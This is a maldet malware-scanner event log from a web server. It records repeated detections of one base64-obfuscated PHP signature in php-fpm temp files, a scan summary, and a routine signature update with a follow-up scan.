Jan 09 2026 03:31:26 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604807db42e.php
Jan 09 2026 03:31:26 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960038b9e64d.php
Jan 09 2026 03:31:26 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960261a7c100.php
Jan 09 2026 03:31:26 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c97b12ee9.php
Jan 09 2026 03:31:26 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a8a5e0617.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960680a49077.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a7ad7060f.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960aa6986767.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe47323409.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696067dc73876.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe45bbbe23.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc1d7abb09.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604531924a4.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960473877cee.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc39ff0b24.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960898f01dbc.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f8196a6f7f.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc1bc2c47c.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69608897ea6f2.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696026d8a8094.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696045bbefa41.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696005c810793.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960067ae084b.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a86141dff.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe31a6d744.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960460e567b1.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69602521290d3.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696067453b566.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69600446060a7.php
Jan 09 2026 03:31:27 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960270e0a3b6.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696047f001964.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc3a825398.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69608797d0193.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa17fc8ac8.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696047112b2b6.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a88e76066.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe2a9da1a9.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696087bd30813.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696086d6dc766.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa242a182a.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960465cca71f.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604547303fd.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa0f822e23.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc25ebb972.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c91e20557.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe41e63337.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696005df8b1ea.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960068e73ee0.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696005b1cfd1d.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960aa7bd1ee0.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc3c1e8885.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960047c66718.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a9d720f3a.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a9bea84f7.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa16722c06.php
Jan 09 2026 03:31:28 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696004120030d.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc392e077d.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa14d094d5.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960069c5deb9.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696025f6bd848.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa281a358f.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f8076bd209.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696045ce8f880.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960875b88de5.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696066ab7f96e.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69600585927de.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe44d60291.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960059c8fa03.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69606732612cd.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696087035753a.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c95040b0f.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe428b5a39.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa2252dea4.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f80854264a.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69602608762fa.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960685e269b2.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe29101e90.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960042d21051.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c964a011c.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696066248eb88.php
Jan 09 2026 03:31:29 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696024fbc055f.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696066d68bc10.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f818ba5344.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696087aaad3be.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f815d4152e.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696005f596b41.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f817362257.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69606759d0334.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960036f0c2ad.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc241a167d.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc32cb40f8.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960686d57e94.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69600499c2e5d.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696065fd2a1f3.php
Jan 09 2026 03:31:30 web1 maldet(1105653): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 24949, malware hits 318, cleaned hits 0, time 208s
Jan 09 2026 03:31:30 web1 maldet(1105653): {scan} scan report saved, to view run: maldet --report 260109-0328.1105653
Jan 09 2026 03:31:30 web1 maldet(1105653): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260109-0328.1105653
Jan 10 2026 04:01:45 web1 maldet(1529042): {update} checking for available updates...
Jan 10 2026 04:01:45 web1 maldet(1529042): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 10 2026 04:01:45 web1 maldet(1529042): {update} hashing install files and checking against server...
Jan 10 2026 04:01:45 web1 maldet(1529042): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 10 2026 04:01:45 web1 maldet(1529042): {update} latest version already installed.
Jan 10 2026 04:01:45 web1 maldet(1529151): {sigup} performing signature update check...
Jan 10 2026 04:01:45 web1 maldet(1529151): {sigup} local signature set is version 20260107676235
Jan 10 2026 04:01:45 web1 maldet(1529151): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 10 2026 04:01:45 web1 maldet(1529151): {sigup} new signature set 202601101643813 available
Jan 10 2026 04:01:45 web1 maldet(1529151): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} verified md5sum of maldet-clean.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} unpacked and installed maldet-clean.tgz
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} signature set update completed
Jan 10 2026 04:01:46 web1 maldet(1529151): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 10 2026 04:01:46 web1 maldet(1529358): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 10 2026 04:01:47 web1 maldet(1529358): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 10 2026 04:01:47 web1 maldet(1529358): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 10 2026 04:01:47 web1 maldet(1529358): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 10 2026 04:01:47 web1 maldet(1529358): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 10 2026 04:02:23 web1 maldet(1529358): {scan} file list completed in 36s, found 6680 files...
Jan 10 2026 04:02:23 web1 maldet(1529358): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 10 2026 04:02:23 web1 maldet(1529358): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6680 files) in progress...
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e3d0be92.php
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d16756f9.php
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614ce143777.php
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614dab21571.php
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618dc65ce3a.php
Jan 10 2026 04:03:15 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cf69a30a.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f34e879e.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69621103130f1.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f04c4f2a2.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf7ce2d74.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f02a6ae0a.php
